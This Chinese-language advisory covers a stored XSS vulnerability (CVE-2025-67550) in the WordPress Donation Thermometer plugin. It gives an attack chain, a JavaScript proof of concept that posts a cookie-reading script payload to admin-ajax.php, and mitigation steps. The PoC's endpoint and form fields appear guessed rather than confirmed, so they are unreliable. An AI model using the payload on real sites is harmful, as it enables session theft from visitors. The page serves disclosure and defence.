CVE-2025-67550 WordPress Donation Thermometer插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67550

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

rhewlif Donation Thermometer (donation-thermometer)

漏洞概述

CVE-2025-67550是WordPress插件Donation Thermometer中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于Web页面生成过程中对用户输入的不当处理，导致恶意JavaScript代码可以被永久存储在服务器端。当其他用户访问受影响的页面时，存储的恶意脚本会在其浏览器中执行，从而窃取会话Cookie、劫持用户账户或进行钓鱼攻击。Donation Thermometer插件是一款用于展示捐款进度的WordPress插件，广泛应用于慈善机构和筹款网站。由于其面向公众的特性，存储型XSS漏洞可能影响大量访问者的浏览器安全。攻击者无需高权限即可利用此漏洞（低权限要求），但需要诱导受害者访问特定页面或触发特定交互。该漏洞的CVSS评分为6.5，属于中等严重程度，主要风险在于对机密性和完整性的低至中度影响。Patchstack安全团队于2025年12月9日披露此漏洞，敦促用户尽快更新至安全版本以防止潜在攻击。

技术细节

该存储型XSS漏洞源于Donation Thermometer插件在处理用户输入时缺乏适当的输入验证和输出编码。攻击者可以通过插件的捐款表单或管理界面提交包含恶意JavaScript代码的输入数据。由于插件未对特殊字符进行正确转义，这些恶意代码被直接存储在WordPress数据库中。当网站前端页面加载并渲染包含捐款进度或相关数据的组件时，恶意脚本会随页面内容一同输出到HTML中。受害者访问这些页面时，浏览器会将其解析为可执行脚本，导致攻击者的JavaScript代码在受害者浏览器上下文中执行。攻击者可利用此漏洞窃取用户会话令牌、修改页面内容、植入恶意重定向或进行进一步的社会工程攻击。由于存储型XSS的持久性特点，一旦攻击成功，恶意代码将在所有访问者浏览器中持续执行，直到漏洞被修复。

攻击链分析

STEP 1

步骤1: 侦察与信息收集

攻击者识别目标网站使用的WordPress Donation Thermometer插件版本，确认版本<=2.2.6以确定漏洞存在

STEP 2

步骤2: 注入点识别

攻击者找到插件的输入字段，可能是捐款表单的捐赠者姓名、留言或管理后台的设置选项

STEP 3

步骤3: 恶意Payload注入

攻击者构造包含JavaScript代码的XSS payload（如<script>alert(document.cookie)</script>）并提交到识别出的注入点

STEP 4

步骤4: 数据持久化

由于插件缺乏输入过滤，恶意代码被直接存储在WordPress数据库中，无需特殊触发条件

STEP 5

步骤5: 受害者访问触发

当普通用户访问展示捐款进度的页面时，存储的恶意脚本随页面HTML一同加载并在用户浏览器中执行

STEP 6

步骤6: 恶意行为执行

攻击者的JavaScript代码在受害者浏览器上下文中执行，可窃取Cookie、会话令牌或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67550 Stored XSS PoC for WordPress Donation Thermometer Plugin
// Target: donation-thermometer plugin <= 2.2.6

// Attacker injects malicious payload in donation form or admin settings
const xssPayload = `<script>alert(document.cookie)</script>`;

// Example: Craft a donation with XSS payload in donor name field
const maliciousDonation = {
    donor_name: xssPayload,
    donation_amount: 100,
    message: 'Test donation'
};

// Send POST request to WordPress admin-ajax.php or plugin endpoint
fetch('/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: new URLSearchParams({
        action: 'donation_thermometer_submit',
        donor_name: maliciousDonation.donor_name,
        amount: maliciousDonation.donation_amount,
        message: maliciousDonation.message
    })
})
.then(response => response.json())
.then(data => console.log('Payload injected:', data));

// Alternative: Use admin panel to inject via settings
// Navigate to: Settings > Donation Thermometer > Add/Edit Thermometer
// Insert payload in any text field (name, message, goal title)
// Save and view frontend page to trigger XSS

影响范围

Donation Thermometer <= 2.2.6

防御指南

临时缓解措施

在等待官方安全更新期间，可采取以下临时缓解措施：1) 临时禁用Donation Thermometer插件或使用替代插件；2) 通过Web应用防火墙(WAF)规则阻止包含<script>标签的请求；3) 限制低权限用户对插件设置和捐款表单的访问权限；4) 在主题functions.php中添加临时XSS过滤函数对插件输出进行消毒处理；5) 加强网站监控，及时发现异常行为。